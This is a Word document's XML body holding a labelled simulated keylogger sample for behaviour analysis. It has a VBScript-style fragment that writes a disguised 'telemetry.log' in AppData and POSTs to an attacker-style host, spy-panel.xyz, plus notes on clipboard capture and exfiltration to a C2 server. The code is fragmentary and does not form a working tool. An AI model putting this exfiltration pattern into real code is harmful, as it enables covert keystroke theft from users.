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 standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <w:body>
    <w:p><w:r><w:t xml:space="preserve">SIMULATED ARTIFACT - ANALYSIS SAMPLE - KEYLOGGER BEHAVIOR REVIEW</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Module SilentEyeHook</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Function LogKeys()</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Set shell = CreateObject("WScript.Shell")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">folder = shell.SpecialFolders("AppData") & "\telemetry.log"</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">CreateTextFile folder, True</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Set http = CreateObject("MSXML2.XMLHTTP")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">http.Open "POST", "http://spy-panel.xyz/telemetry?apikey=77aabbcc&callback=http://silenteye.example.net", False</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Obfuscated strings: Chr(68,101,109,111,32,102,105,108,101,32,114,101,112,111,114,116)</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Keypress sampling interval: 5 seconds, clipboard capture enabled.</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Log retention: 30 days before exfiltration to C2.</w:t></w:r></w:p>
  </w:body>
</w:document>

</file>